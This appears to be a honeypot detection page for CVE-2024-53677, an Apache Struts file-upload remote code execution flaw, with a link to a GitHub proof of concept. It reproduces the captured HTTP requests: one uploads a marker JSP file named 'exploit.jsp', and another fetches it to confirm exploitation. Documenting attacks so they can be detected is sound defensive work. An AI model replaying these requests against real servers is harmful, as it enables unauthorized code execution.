Apache Struts

CVE-2024-53677 - RCE

Detection:

  • Uploading a Malicious File:

    POST /actionFileUpload HTTP/1.1
Host: [honeypot IP address]:8090
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, zstd
Accept: */*
Connection: keep-alive
Content-Length: 222
Content-Type: multipart/form-data; boundary=0abcfc26e3fa0afbd6db1ba369dfcc37

--0abcfc26e3fa0afbd6db1ba369dfcc37
Content-Disposition: form-data; name="file"; filename="exploit.jsp"
Content-Type: application/octet-stream

<% out.println("Apache Struts"); %>
--0abcfc26e3fa0afbd6db1ba369dfcc37--

    This request uploads a malicious .jsp script designed to confirm successful exploitation.

  • Verifying the Uploaded File:

    GET /actionFileUpload/exploit.jsp HTTP/1.1
Host: [honeypot IP]:8090
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, zstd
Accept: */*
Connection: keep-alive

PoC:

LogoGitHub - TAM-K592/CVE-2024-53677-S2-067: A critical vulnerability, CVE-2024-53677, has been identified in the popular Apache Struts framework, potentially allowing attackers to execute arbitrary code remotely. This vulnerability arises from flaws in the file upload logic, which can be exploited to perform path traversal and malicious file uploads.GitHub
PreviousApache OFBizNextApache Traffic Control

Last updated